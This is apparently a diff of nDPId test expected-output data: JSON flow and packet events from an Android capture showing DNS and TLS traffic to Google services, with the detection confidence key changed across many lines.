-00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1582454868597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454868597,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRZjUAAEARjwXAqAIBwKgCEAA1yOYAPQ9d2tuBgAABAAEAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAcAMAAEAAQAAAEEABKzZqM4="} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.168.206"}} -00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":144,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -02253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":146,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3903,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","alpn":"http\/1.1","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} 
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454868597,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.168.206"}} +00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":144,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1613,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
+02253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":146,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868527,"flow_last_seen":1582454868603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3903,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1582454868603,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WIT
H_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","alpn":"http\/1.1","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1582454868606,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1582454868606,"pkt":"MzMAAQACTGr2n\/Ynht1gBNipADwRAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAQACAiICIwA8Uc8B2OT+AAEADgABAAEl5RSOTGr2n\/YnAAMADA4ACMoAAAAAAAAAAAAIAAIAAAAGAAQAFwAY"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454868843,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454868843,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8fo0AAHYGRJqs2RIDwKgCEAG7kBjGuYRJgnUILaAS6yAZNAAAAgQFZAQCCApRt9Th\/\/80QwEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454868844,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454868844,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0PHBAAEAGfL\/AqAIQrNkSA5AYAbuCdQgtxrmESoAQAVcxKAAAAQEICv\/\/NJZRt9Th"} 
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868511,"flow_last_seen":1582454868936,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868936,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868511,"flow_last_seen":1582454868936,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454868936,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
+00874{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868511,"flow_last_seen":1582454869031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":872,"flow_tot_l4_payload_len":1067,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1582454869031,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"},"tls": {"version":"TLSv1.2","client_requested_server_name":"connectivitycheck.gstatic.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1582454869361,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1582454869361,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA+qnVAAEARCtjAqAIQwKgCAZhgADUAKv996DEBAAABAAAAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAQ=="} 
-00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869361,"flow_last_seen":1582454869361,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1582454869361,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1582454869363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1582454869363,"pkt":"TGr2n\/YnxiwDYGpkCABFAABORPIAAEARsEvAqAIBwKgCEAA1mGAAOr6H6DGBgAABAAEAAAAABW10YWxrBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454869363,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"mtalk.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454869363,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": 
{"query":"mtalk.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869517,"flow_last_seen":1582454869517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869517,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1582454869517,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869517,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ooxAAEAGf8\/AqAIQrNmozsTQAbv86pehAAAAAKAC\/\/+fWQAAAgQFtAQCCAr\/\/zUtAAAAAAEDAwg="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1582454869556,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869556,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA80VwAAHUGW\/+s2ajOwKgCEAG7xNCPRbjJ\/OqXoqAS6yAGLQAAAgQFZAQCCApmsf+J\/\/81LQEDAwg="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1582454869557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454869557,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0oo1AAEAGf9bAqAIQrNmozsTQAbv86peij0W4yoAQAVceWQAAAQEICv\/\/NUhmsf+J"} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454869517,"flow_last_seen":1582454869614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454869614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454869517,"flow_last_seen":1582454869614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1582454869614,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454869626,"flow_last_seen":1582454869626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454869626,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1582454869626,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454869626,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8g2ZAAEAG9TXAqAIQ2O8meMFmFGxVMrY\/AAAAAKAC\/\/9vQQAAAgQFtAQCCAr\/\/zVZAAAAAAEDAwg="} -00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01413{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":176,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454869517,"flow_last_seen":1582454869657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1582454869657,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","server_names":"*.google-analytics.com,*.fps.goog,app-measurement.com,fps.goog,google-analytics.com,googleoptimize.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googleoptimize.com,www.googletagmanager.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"9d9ce860f1b1cbef07b019450cb368d8","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google-analytics.com","alpn":"http\/1.1","fingerprint":"B0:D9:D3:57:C2:34:87:2C:FB:F5:E6:BD:7F:9F:54:65:08:61:AF:01"}} 
